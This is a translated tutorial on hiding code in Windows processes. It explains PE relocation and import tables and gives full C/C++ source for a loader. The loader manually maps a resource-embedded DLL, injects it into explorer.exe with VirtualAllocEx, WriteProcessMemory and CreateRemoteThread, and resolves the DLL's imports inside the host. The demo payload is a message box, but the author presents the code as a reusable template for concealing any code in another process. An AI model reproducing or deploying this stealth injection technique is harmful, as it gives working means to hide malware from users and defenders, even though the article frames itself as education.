In the NT environment, process hiding covers the many ways of getting your code to run without the user noticing, such as using the registry to insert a DLL or using Windows hooks. The typical examples are the LoadLibrary method introduced by Jeffrey Richter in Windows core programming and the method described by Luo Yunbin in Windows 32-bit assembly language programming. What the two methods have in common is that a remote thread runs the code as a thread of the host process, inside the host's address space, and that is what hides it. Of the two, Richter's method is easier to understand and implement because it can be written in a high-level language such as C/C++. However, it makes the host process call LoadLibrary to load a new DLL, so the hiding is inevitably imperfect. Luo Yunbin's method is first-class in terms of hiding, but it is hard to implement because it is written in assembly language (I, for one, cannot write assembly programs :)). The method described below can be seen as a combination of the two: it is coded in C/C++ yet achieves full hiding. It also greatly simplifies writing the remote thread code, making it about as easy as writing an ordinary program.
Basic knowledge
Making your code a thread of the host process and running it in the host's address space is a good idea. However, placing a program in the address space of another process raises a serious problem: code relocation. To see what relocation means, consider the following program:
...
int func()            // definition of func
...
int a = func();       // call to func
...
After compilation, this program may look like the following:
...
0x00401800: push ebp                      // entry of func
0x00401801: mov ebp, esp
...
0x00402000: call 00401800                 // call func
0x00402005: mov dword ptr [ebp-08], eax
...
Note the direct-addressing instruction "call 00401800" at 0x00402000. When the program runs normally (loaded and executed by Windows), the PE file header contains enough information for the system to load the code at a suitable location, so address 00401800 really is the entry of func. When we place the program into the address space of another process ourselves, there is no such guarantee. The result may look like this:
...
0x00801800: push ebp                      // entry of func
0x00801801: mov ebp, esp
...
0x00802000: call 00401800                 // what is at 0x00401800?
0x00802005: mov dword ptr [ebp-08], eax
...
Obviously, running the code above produces unpredictable results (most likely, the thread running the code we worked so hard to load will be killed by the system together with the host process). You may wonder how the system copes with this when it loads a dynamic link library (DLL). A DLL may be loaded at different addresses in different processes, so the system must solve the same problem of relocating direct-addressing instructions in DLLs. It turns out that most DLLs contain data inserted by the compiler for this purpose, which forms the relocation table. The system patches the DLL code according to the data in the relocation table to complete the relocation. Richter's LoadLibrary method relies on this as well. Our approach is therefore to do the system's job ourselves and relocate the code according to the relocation table. With that in mind, let's look at the relocation table.
First, consider what information the relocation table needs to store. Take the code above as an example. For it to run correctly, "call 00401800" must be changed to "call 00801800". This change requires two pieces of data. The first is where to change, that is, the memory address of the data, which here is 0x00802001 (not 0x00802000). The second is how to change it, that is, how much to add to the data at that location, which here is 0x00400000. The second value can be calculated as the actual load address of the DLL minus its preferred load address. The actual load address is known at load time, and the preferred load address is recorded in the ImageBase field of the file header. In summary, the only information the relocation table has to store is the addresses of the data to be corrected.
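The arithmetic above can be sketched in portable C. This is only an illustration under stated assumptions: `reloc_delta` and `patch_address` are hypothetical helper names, and the byte buffer stands in for the copied code (one opcode byte followed by a 32-bit address).

```c
#include <stdint.h>
#include <string.h>

/* Relocation delta: actual load address minus the preferred ImageBase. */
static uint32_t reloc_delta(uint32_t actual_base, uint32_t preferred_base)
{
    return actual_base - preferred_base;
}

/* Add delta to the 32-bit value stored at code[offset] and return the new
   value. memcpy is used so that unaligned offsets are safe. */
static uint32_t patch_address(uint8_t *code, uint32_t offset, uint32_t delta)
{
    uint32_t value;
    memcpy(&value, code + offset, sizeof value);
    value += delta;
    memcpy(code + offset, &value, sizeof value);
    return value;
}
```

With a preferred base of 0x00400000 and an actual base of 0x00800000, the delta is 0x00400000, and patching the operand one byte past the opcode turns 00401800 into 00801800.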
Location | Data      | Description
0000h    | 00001000h | Page start address (RVA)
0004h    | 00000010h | Relocation block length
0008h    | 3006h     | First relocation item, a 32-bit value must be corrected
000Ah    | 300Dh     | Second relocation item, a 32-bit value must be corrected
000Ch    | 3015h     | Third relocation item, a 32-bit value must be corrected
000Eh    | 0000h     | Fourth relocation item, used for alignment
0010h    | 00003000h | Page start address (RVA)
0014h    | 0000000Ch | Relocation block length
0018h    | 3008h     | First relocation item, a 32-bit value must be corrected
001Ah    | 302Ah     | Second relocation item, a 32-bit value must be corrected
...      | ...       | Other relocation blocks
0100h    | 0000h     | Relocation table end mark
Now that we know what information the relocation table should store, let's see how the relocation table in a PE file actually stores it. The location and size of the relocation table can be obtained from the sixth IMAGE_DATA_DIRECTORY structure in the data directory of the PE file header. Recording one code address to be corrected takes a double word (DWORD, 32 bits) of storage, and a program contains many direct-addressing instructions. To save space, Windows therefore stores the relocation table in a compressed form, in blocks of one page (4 KB) each. Addressing within a page needs only 12 bits. Combining these 12 bits with 4 additional bits of information yields a 16-bit relocation item. Precede all the relocation items of a page with one DWORD giving the start address of the page and another DWORD giving the length of the relocation block, and every address to be relocated on that page is recorded. The relocation blocks follow one another, and the table ends with a block whose page start address is 0. The preceding table is an example of a relocation table.
As mentioned above, each relocation item also carries 4 bits of additional information. These are the high 4 bits of the relocation item. Although 4 bits are available, in practice only two values appear: 0 and 3. 0 means the item is used only for alignment and has no other meaning. 3 means that the 32-bit double word at the address the item points to must be corrected. Note that the page start address is a relative virtual address (RVA); the load address must be added to obtain the actual page address. For example, the first relocation item in the table above says that the data to be relocated is located at the following address (assuming a load address of 00400000h): load address (00400000h) + page address (1000h) + offset within the page (0006h) = 00401006h.
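The block layout described above can be walked with a few lines of portable C. This is a minimal sketch, not the article's RelocImage: `collect_reloc_rvas`, `rd16` and `rd32` are hypothetical names, the table is assumed to be a little-endian byte buffer, and only item type 3 is handled.

```c
#include <stddef.h>
#include <stdint.h>

/* Read little-endian fields without assuming alignment. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Walk a relocation table and store the RVA of every type-3 item in out[].
   Returns the number of such items found (at most max_out are stored). */
static size_t collect_reloc_rvas(const uint8_t *table, size_t table_size,
                                 uint32_t *out, size_t max_out)
{
    size_t pos = 0, count = 0;
    while (pos + 8 <= table_size) {
        uint32_t page_rva   = rd32(table + pos);      /* page start address */
        uint32_t block_size = rd32(table + pos + 4);  /* header plus items  */
        if (page_rva == 0 || block_size < 8 || pos + block_size > table_size)
            break;                                    /* end mark or malformed */
        for (size_t i = 8; i + 2 <= block_size; i += 2) {
            uint16_t item = rd16(table + pos + i);
            if ((item >> 12) != 3)                    /* 0 is alignment padding */
                continue;
            if (count < max_out)
                out[count] = page_rva + (item & 0x0FFFu);
            count++;
        }
        pos += block_size;
    }
    return count;
}
```

Fed the two blocks from the example table, this yields the RVAs 1006h, 100Dh, 1015h, 3008h and 302Ah. Adding a load address of 00400000h to the first gives 00401006h, matching the calculation above.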
The relocation problem is now solved, and it might seem that we can start coding. However, if you have read other articles about process hiding (those following Jeffrey Richter's approach excepted), you may have noticed that they always call Windows APIs through explicit linking. For example, the following is a call to MessageBox:
// fnLoadLibrary and fnGetProcAddress point to the Windows API functions LoadLibraryW and GetProcAddress respectively.
typedef int (WINAPI *FxMsgBox)(HWND, LPCWSTR, LPCWSTR, UINT);
…
HMODULE hUser32 = fnLoadLibrary(L"User32.dll");
FxMsgBox fnMsgBox = (FxMsgBox)(fnGetProcAddress(hUser32, "MessageBoxW"));
fnMsgBox(…);
…
Why don't they use the simpler implicit linking? It turns out that to link a DLL implicitly and call its exported functions, two conditions must hold. First, the DLL must already be loaded when the program runs; otherwise an error occurs. Second, the instruction that calls an API function generally has the form call dword ptr [XXXXXXXX], and for the program to run correctly the entry address of the target function must be stored at "XXXXXXXX" before the call is made. When a program is loaded normally, the system guarantees both. When you load the program yourself, guaranteeing them is troublesome, so these articles generally use explicit linking to sidestep both issues.
If you don't mind writing a typedef and a GetProcAddress call for each API (and perhaps a LoadLibrary call too), explicit linking is enough. But consider real code: calling dozens or even hundreds of APIs is common, and writing this repetitive code for each of them makes programming tedious. We therefore have to solve these two problems and use implicit linking. The idea is the same as for the relocation problem: do the system's job ourselves. Before the remote thread code calls its first API, load the DLLs and fill in the corresponding entry addresses.
// Excerpt from winnt.h
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD Characteristics;
        DWORD OriginalFirstThunk;
    };
    DWORD TimeDateStamp;
    DWORD ForwarderChain;
    DWORD Name;
    DWORD FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
As before, we start with the background knowledge: the import table of the PE file. The import table records the names of all DLL files that a Win32 program loads implicitly and the names of the API functions imported from them. Its location and size can be obtained from the second IMAGE_DATA_DIRECTORY in the data directory of the PE file header. The import table is an array of IMAGE_IMPORT_DESCRIPTOR structures, each corresponding to one DLL to be loaded implicitly. The whole table ends with an IMAGE_IMPORT_DESCRIPTOR whose Characteristics field is 0. The definition of the IMAGE_IMPORT_DESCRIPTOR structure is given above.
The Name field is an RVA pointing to the file name of the DLL that the structure describes. The file name is a null-terminated string. In the PE file, OriginalFirstThunk and FirstThunk are both RVAs, pointing to two arrays of IMAGE_THUNK_DATA structures with identical content. Each structure corresponds to one imported function, and each array ends with an IMAGE_THUNK_DATA structure whose content is 0. The IMAGE_THUNK_DATA structure is defined as follows:
// Excerpt from winnt.h
typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;   // PBYTE
        DWORD Function;          // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;     // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA32;
typedef IMAGE_THUNK_DATA32 IMAGE_THUNK_DATA;
From the definition above, we can see that an IMAGE_THUNK_DATA structure can be treated as a DWORD. When the highest bit of the DWORD is 1, the function is imported by ordinal; otherwise it is imported by name, and the DWORD is an RVA pointing to an IMAGE_IMPORT_BY_NAME structure. The predefined constant IMAGE_ORDINAL_FLAG in winnt.h can be used to test whether the highest bit is 1. The IMAGE_IMPORT_BY_NAME structure is defined as follows:
// Excerpt from winnt.h
typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD Hint;
    BYTE Name[1];
} IMAGE_IMPORT_BY_NAME;
The Hint field is optional. If it is not 0, it is a hint at the position of the function in the DLL's export name table, which lets the loader try that entry first. We do not need to consider it in our code. Although the Name array in the definition above has only one element, it is actually a variable-length array holding a null-terminated string, which is the function name.
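The two cases can be told apart as in the following portable sketch. The helper names are hypothetical, `ORDINAL_FLAG32` is defined locally with the same value as IMAGE_ORDINAL_FLAG32 in winnt.h, and `image` is assumed to be a byte buffer holding the mapped DLL so that an RVA can be used as an offset into it.

```c
#include <stdint.h>

#define ORDINAL_FLAG32 0x80000000u  /* same value as IMAGE_ORDINAL_FLAG32 */

/* Returns 1 if the 32-bit thunk imports by ordinal, 0 if it imports by name. */
static int thunk_is_ordinal(uint32_t thunk)
{
    return (thunk & ORDINAL_FLAG32) != 0;
}

/* When the flag is set, the low 16 bits hold the ordinal. */
static uint16_t thunk_ordinal(uint32_t thunk)
{
    return (uint16_t)(thunk & 0xFFFFu);
}

/* For a by-name thunk, the value is the RVA of an IMAGE_IMPORT_BY_NAME:
   a 2-byte Hint followed by the null-terminated function name. */
static const char *thunk_name(const uint8_t *image, uint32_t thunk)
{
    return (const char *)(image + thunk + 2);
}
```

Skipping two bytes past the RVA is what reading the Name member of IMAGE_IMPORT_BY_NAME amounts to, since Hint is a 16-bit WORD.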
Perhaps the explanation above has made you dizzy. The following figure shows the actual structure of the import table; I hope it helps clear your head:
After the explanation above, you may wonder: since OriginalFirstThunk and FirstThunk point to exactly the same content, wouldn't one of them be enough? Do not doubt the Windows designers. The two are indeed identical in the PE file, but once the file is loaded into memory a difference appears: the content of OriginalFirstThunk does not change, while the data in FirstThunk is replaced by the entry addresses of the corresponding functions. The following figure shows the structure of the import table in memory:
In fact, the "XXXXXXXX" in the call dword ptr [XXXXXXXX] instruction mentioned earlier is the address of an IMAGE_THUNK_DATA in the FirstThunk array, and after loading that IMAGE_THUNK_DATA holds the entry address of the corresponding function. So that is how dynamic linking works!
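The difference between the two arrays after loading can be modeled with plain arrays. This is a sketch under stated assumptions: `bind_thunks`, `resolve_fn` and `demo_resolve` are hypothetical, and `demo_resolve` only stands in for a real lookup such as GetProcAddress by returning a made-up address.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical resolver type: maps a lookup entry to an entry address. */
typedef uint32_t (*resolve_fn)(uint32_t lookup_entry);

/* Stand-in resolver for the example; the addresses it returns are invented. */
static uint32_t demo_resolve(uint32_t lookup_entry)
{
    return 0x77000000u + lookup_entry;
}

/* Walk the two zero-terminated arrays in parallel. lookup[] plays the role
   of OriginalFirstThunk and is left untouched; iat[] plays the role of
   FirstThunk and receives the resolved entry addresses.
   Returns the number of slots filled. */
static size_t bind_thunks(const uint32_t *lookup, uint32_t *iat,
                          resolve_fn resolve)
{
    size_t n = 0;
    for (; lookup[n] != 0; n++)
        iat[n] = resolve(lookup[n]);
    return n;
}
```

After the call, `lookup` still describes what was imported, while each `iat` slot holds the address that an indirect call through it would reach.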
Programming implementation
That completes the background knowledge needed for process hiding. Next we start programming. I will describe the remaining issues alongside the code.
We need to write two programs. One is a DLL that contains the code and data to be inserted into the host process. The other is the loader, which places the DLL into the host process and runs its code by creating a remote thread. For better hiding, I added the compiled DLL to the loader as a resource. As the host process I chose explorer.exe, because it is present on every Windows system. After the loader runs, the remote thread pops up a message box to show that the code was inserted successfully.
The two programs share a header file, "ThreadParam.h", in which I define the structure of the parameter passed to the remote thread. The structure contains two function pointers, which point to the Windows APIs "LoadLibrary" and "GetProcAddress" respectively, and a pointer to the base address of the remote thread's image in the target process, which is described in detail later. The content of "ThreadParam.h" is as follows:
typedef HMODULE (WINAPI *FxLoadLibrary)(LPCSTR lpFileName);
typedef FARPROC (WINAPI *FxGetProcAddr)(HMODULE hModule, LPCSTR lpProcName);
typedef struct tagTHREADPARAM
{
    FxLoadLibrary fnLoadLibrary;
    FxGetProcAddr fnGetProcAddr;
    LPBYTE pImageBase;
} THREADPARAM, *PTHREADPARAM;
Let's look at the loader first. This part touches on other aspects of the PE file format, which I will not describe in detail for reasons of space; please refer to the relevant material. To keep the program short, I also assume that nothing ever fails and have removed all error-handling code.
First, the global variable and constants used in the program. "_pinh" points to the PE file header of the DLL embedded in the loader, for use wherever it is needed. The four macros that follow are defined for convenience. "IMAGE_SIZE" is the size of the DLL image, that is, the amount of memory to allocate in the host process. "RVA_EXPORT_TABEL" is the RVA of the DLL's export table. "RVA_RELOC_TABEL" is the RVA of the DLL's relocation table. "PROCESS_OPEN_MODE" is the access mode used to open the host process; only with these rights can we do all the necessary work.
static PIMAGE_NT_HEADERS _pinh = NULL;
#define IMAGE_SIZE (_pinh->OptionalHeader.SizeOfImage)
#define RVA_EXPORT_TABEL (_pinh->OptionalHeader.DataDirectory[0].VirtualAddress)
#define RVA_RELOC_TABEL (_pinh->OptionalHeader.DataDirectory[5].VirtualAddress)
#define PROCESS_OPEN_MODE (PROCESS_CREATE_THREAD|PROCESS_VM_WRITE|PROCESS_VM_OPERATION)
The following is the definition of the main function, which shows the general steps. The number in each comment marks where the corresponding step starts.
int APIENTRY _tWinMain(HINSTANCE hInst, HINSTANCE, LPTSTR lpCmdLine, int nCmdShow)
{
    LPTHREAD_START_ROUTINE pEntry = NULL;
    PTHREADPARAM pParam = NULL;
    LPBYTE pImage = (LPBYTE)MapRsrcToImage(); //①
    DWORD dwProcessId = GetTargetProcessId(); //②
    HANDLE hProcess = OpenProcess(PROCESS_OPEN_MODE, FALSE, dwProcessId);
    LPBYTE pInjectPos = (LPBYTE)VirtualAllocEx(hProcess, NULL, IMAGE_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    PrepareData(pImage, pInjectPos, (PVOID*)&pEntry, (PVOID*)&pParam); //③
    WriteProcessMemory(hProcess, pInjectPos, pImage, IMAGE_SIZE, NULL); //④
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, pEntry, pParam, 0, NULL);
    CloseHandle(hThread); //⑤
    CloseHandle(hProcess);
    VirtualFree(pImage, 0, MEM_RELEASE);
    return 0;
}
Step 1: map the DLL file in the resource into memory to form an image. This step is done by the "MapRsrcToImage" function. It first opens the DLL in the resource, finds the DLL's PE file header, and points the global variable _pinh at it. Then, based on the "SizeOfImage" field in the file header, it allocates enough memory in the loader process to hold the DLL's memory image. (For convenience, all data preparation is done in the loader process, and only at the very end is the prepared data written to the host process in one go.) Mapping the DLL into memory is done section by section. The section table (IMAGE_SECTION_HEADER) in the PE file gives the size of each section, its location in the file, and the location (RVA) where it should be placed in memory. The file header does not belong to any section; we place its data at the start of the memory area (the reason is explained when the DLL program is introduced).
static LPBYTE MapRsrcToImage() // map the DLL in the resource into memory
{
    HRSRC hRsrc = FindResource(NULL, _T("rtdll"), _T("rt_dll"));
    HGLOBAL hGlobal = LoadResource(NULL, hRsrc);
    LPBYTE pRsrc = (LPBYTE)LockResource(hGlobal);
    _pinh = (PIMAGE_NT_HEADERS)(pRsrc + ((PIMAGE_DOS_HEADER)pRsrc)->e_lfanew);
    LPBYTE pImage = (LPBYTE)VirtualAlloc(NULL, IMAGE_SIZE, MEM_COMMIT, PAGE_READWRITE);
    DWORD dwSections = _pinh->FileHeader.NumberOfSections;
    // headers first: everything up to the end of the section table
    DWORD dwBytes2Copy = (((LPBYTE)_pinh) - pRsrc) + sizeof(IMAGE_NT_HEADERS);
    PIMAGE_SECTION_HEADER pish = (PIMAGE_SECTION_HEADER)(pRsrc + dwBytes2Copy);
    dwBytes2Copy += dwSections * sizeof(IMAGE_SECTION_HEADER);
    memcpy(pImage, pRsrc, dwBytes2Copy);
    // then each section, from its file offset to its RVA
    for (DWORD i = 0; i < dwSections; i++, pish++)
    {
        LPBYTE pSrc = pRsrc + pish->PointerToRawData;
        LPBYTE pDest = pImage + pish->VirtualAddress;
        dwBytes2Copy = pish->SizeOfRawData;
        memcpy(pDest, pSrc, dwBytes2Copy);
    }
    _pinh = (PIMAGE_NT_HEADERS)(pImage + ((PIMAGE_DOS_HEADER)pImage)->e_lfanew);
    return pImage;
}
Step 2: open the host process and allocate the memory in it that the data will be written to. This step is relatively simple. The GetTargetProcessId function is used to obtain the process ID of explorer.exe.
static DWORD GetTargetProcessId() // obtain the PID of the explorer process
{
    DWORD dwProcessId = 0;
    HWND hWnd = FindWindow(_T("Progman"), _T("Program Manager"));
    GetWindowThreadProcessId(hWnd, &dwProcessId);
    return dwProcessId;
}
Step 3: prepare the data to be written to the host process. In this step we relocate the DLL image created in ① according to the base address of the memory allocated in ②, prepare the parameters for the thread, and calculate the thread entry address.
static void PrepareData(LPBYTE pImage, LPBYTE pInjectPos, PVOID* ppEntry, PVOID* ppParam)
{
    LPBYTE pRelocTbl = pImage + RVA_RELOC_TABEL;
    DWORD dwRelocOffset = (DWORD)pInjectPos - _pinh->OptionalHeader.ImageBase;
    RelocImage(pImage, pRelocTbl, dwRelocOffset);
    // the relocation table is no longer needed, so reuse its space for the parameters
    PTHREADPARAM param = (PTHREADPARAM)pRelocTbl;
    HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll"));
    param->fnGetProcAddr = (FxGetProcAddr)GetProcAddress(hKernel32, "GetProcAddress");
    param->fnLoadLibrary = (FxLoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA");
    param->pImageBase = pInjectPos;
    *ppParam = pInjectPos + RVA_RELOC_TABEL;
    *ppEntry = pInjectPos + GetEntryPoint(pImage);
}
The function first calculates the value to be added to the relocated data from the actual load address and the preferred load address, and then calls the "RelocImage" function to perform the relocation. "RelocImage" relocates the DLL image according to the structure of the relocation table described above. Are you surprised when you read the "RelocImage" code? We spent so much effort explaining relocation, yet it takes only a few lines to implement! This shows that the PE file format is quite simple and nothing to be afraid of. The code that handles implicit linking later proves the point again.
static void RelocImage(PBYTE pImage, PBYTE pRelocTbl, DWORD dwRelocOffset)
{
    PIMAGE_BASE_RELOCATION pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl;
    while (pibr->VirtualAddress != 0) // a page RVA of 0 ends the table
    {
        WORD* arrOffset = (WORD*)(pRelocTbl + sizeof(IMAGE_BASE_RELOCATION));
        DWORD dwRvaCount = (pibr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / 2;
        for (DWORD i = 0; i < dwRvaCount; i++)
        {
            DWORD dwRva = arrOffset[i];
            if ((dwRva & 0xf000) != 0x3000) // skip items that are not 32-bit corrections
                continue;
            dwRva &= 0x0fff; // offset within the page
            dwRva += pibr->VirtualAddress + (DWORD)pImage;
            *(DWORD*)dwRva += dwRelocOffset;
        }
        pRelocTbl += pibr->SizeOfBlock;
        pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl;
    }
}
Since the memory allocated in the host process is only IMAGE_SIZE bytes, the thread parameters have to be stored somewhere inside the image. They must be written only after relocation is complete, because once relocation is done the relocation table is no longer needed and we can borrow its space for the thread parameters. That space is normally enough unless you need to pass a lot of parameters. The address of the parameters in the host is therefore the actual load address plus the RVA of the relocation table.
The final task is to obtain the thread entry address, which is done by the function "GetEntryPoint". Our DLL exports a function named "ThreadEntry" whose prototype is compatible with the Windows thread entry function, and we use it as the body of the remote thread. GetEntryPoint finds the address of ThreadEntry in the image using the DLL's export table and returns it. The address returned by "GetEntryPoint" is an RVA, however, so the load address "pInjectPos" must be added to get the actual entry address.
static DWORD GetEntryPoint(LPBYTE pImage)
{
    DWORD dwEntry = 0, index = 0;
    IMAGE_EXPORT_DIRECTORY* pied = (IMAGE_EXPORT_DIRECTORY*)(pImage + RVA_EXPORT_TABEL);
    DWORD* pNameTbl = (DWORD*)(pImage + pied->AddressOfNames);
    for (index = 0; index < pied->NumberOfNames; index++, pNameTbl++)
        if (strcmp("ThreadEntry", (char*)(pImage + (*pNameTbl))) == 0)
        {
            // name index -> ordinal index -> function RVA
            index = ((WORD*)(pImage + pied->AddressOfNameOrdinals))[index];
            dwEntry = ((DWORD*)(pImage + pied->AddressOfFunctions))[index];
            break;
        }
    return dwEntry;
}
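The three-table lookup used by GetEntryPoint (name, then ordinal index, then function RVA) can be modeled without any Windows headers. This is a simplified sketch: `export_view` and `find_export_rva` are hypothetical, and the tables are assumed to be already resolved to pointers rather than RVAs.

```c
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the three export tables. */
typedef struct {
    const char *const *names;      /* plays the role of AddressOfNames        */
    const uint16_t    *ordinals;   /* plays the role of AddressOfNameOrdinals */
    const uint32_t    *functions;  /* plays the role of AddressOfFunctions    */
    uint32_t           name_count; /* plays the role of NumberOfNames         */
} export_view;

/* Returns the RVA of the named export, or 0 if the name is not exported. */
static uint32_t find_export_rva(const export_view *ev, const char *name)
{
    for (uint32_t i = 0; i < ev->name_count; i++) {
        if (strcmp(ev->names[i], name) == 0)
            return ev->functions[ev->ordinals[i]];
    }
    return 0;
}
```

The extra hop through the ordinal table matters because the position of a name in the name table generally differs from the position of its function in the function table.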
Step 4: Write the prepared data to the host process and create a remote thread to run the written code.
Step 5: clean up before the loader exits.
That is all there is to the loader. Next comes the DLL program. As mentioned above, the DLL exports a function named "ThreadEntry" as the remote thread entry, so we start with "ThreadEntry".
extern DWORD ThreadMain(HINSTANCE hInst);
DWORD WINAPI ThreadEntry(PTHREADPARAM pParam)
{
    DWORD dwResult = -1;
    __try
    {
        if (LoadImportFx(pParam->pImageBase, pParam->fnLoadLibrary, pParam->fnGetProcAddr))
            dwResult = ThreadMain((HINSTANCE)pParam->pImageBase);
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        dwResult = -2;
    }
    return dwResult;
}
The whole of ThreadEntry is wrapped in an SEH (structured exception handling) block, which keeps the host from being killed by the system because of an error in the parasitic code. ThreadEntry first calls the LoadImportFx function to handle the implicitly linked DLLs.
LoadImportFx works through the import table structure described above: it uses LoadLibrary to load each DLL, then uses GetProcAddress to obtain the entry address of each imported function and writes it into the corresponding IMAGE_THUNK_DATA. Here I should explain why the remote thread can call these two functions using the LoadLibrary and GetProcAddress entry addresses obtained in the loader process. After all, as noted above, we cannot be sure that the DLL containing them is loaded in the host, nor that the addresses are valid there. I rely on two facts about Windows. First, practically every Windows process loads kernel32.dll (on my machine the only exception is smss.exe), and both functions are located in kernel32.dll. Second, every process that loads kernel32.dll loads it at the same memory address, because it is one of the most basic DLLs in Windows. In the vast majority of cases, therefore, this causes no problem.
BOOL LoadImportFx(LPBYTE pBase, FxLoadLibrary fnLoadLibrary, FxGetProcAddr fnGetProcAddr)
{
    PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)(pBase + pidh->e_lfanew);
    PIMAGE_IMPORT_DESCRIPTOR piid = (PIMAGE_IMPORT_DESCRIPTOR)
        (pBase + pinh->OptionalHeader.DataDirectory[1].VirtualAddress);
    for (; piid->OriginalFirstThunk != 0; piid++)
    {
        HMODULE hDll = fnLoadLibrary((LPCSTR)(pBase + piid->Name));
        PIMAGE_THUNK_DATA pOrigin = (PIMAGE_THUNK_DATA)(pBase + piid->OriginalFirstThunk);
        PIMAGE_THUNK_DATA pFirst = (PIMAGE_THUNK_DATA)(pBase + piid->FirstThunk);
        LPCSTR pFxName = NULL;
        PIMAGE_IMPORT_BY_NAME piibn = NULL;
        for (; pOrigin->u1.Ordinal != 0; pOrigin++, pFirst++)
        {
            if (pOrigin->u1.Ordinal & IMAGE_ORDINAL_FLAG) // imported by ordinal
                pFxName = (LPCSTR)IMAGE_ORDINAL(pOrigin->u1.Ordinal);
            else // imported by name
            {
                piibn = (PIMAGE_IMPORT_BY_NAME)(pBase + pOrigin->u1.AddressOfData);
                pFxName = (LPCSTR)piibn->Name;
            }
            pFirst->u1.Function = (DWORD)fnGetProcAddr(hDll, pFxName);
        }
    }
    return TRUE;
}
Once implicit linking has been handled, ThreadEntry calls ThreadMain to do the actual work of the remote thread. You may have noticed that ThreadMain takes a parameter of type HINSTANCE, but ThreadEntry shows that what is passed is really the DLL's load address in the host. Why does this work? The answer is: I don't know; ask Microsoft. What I have observed is that in an ordinary program the handle of any module is the address at which the module is loaded, so I simply followed suit. This also explains why the file header was placed at the base address of the image when the image was mapped earlier: the system needs the file header information, so I have to provide it. (The LoadImportFx function also needs the file header to locate the import table, but that is not the fundamental reason, because it could be done in other ways.)
Below is my ThreadMain, which pops up the message box mentioned above. See? You can write remote thread code just like an ordinary program. There is no complicated self-positioning and no annoying explicit linking. What a wonderful world!
Summary
This article simplifies process hiding to a considerable extent. You could even use it as a template and implement only a ThreadMain to hide whatever code you like in another process. However, that is by no means the purpose of this article. I hope readers will treat it purely as a technique and use it to deepen their understanding of the Windows system. In fact, the handling of dynamic linking in this article falls far short of what the operating system does. For example, the data directory of the PE file currently uses 15 entries, but this article handles only four of them: the export table, the import table, the relocation table, and the IAT (which can be regarded as part of the import table). Without handling all 15 entries, the remote code may behave differently from normally loaded code. I hope to work with readers to keep improving this technique and to use it responsibly, so as to better prevent and control malicious code.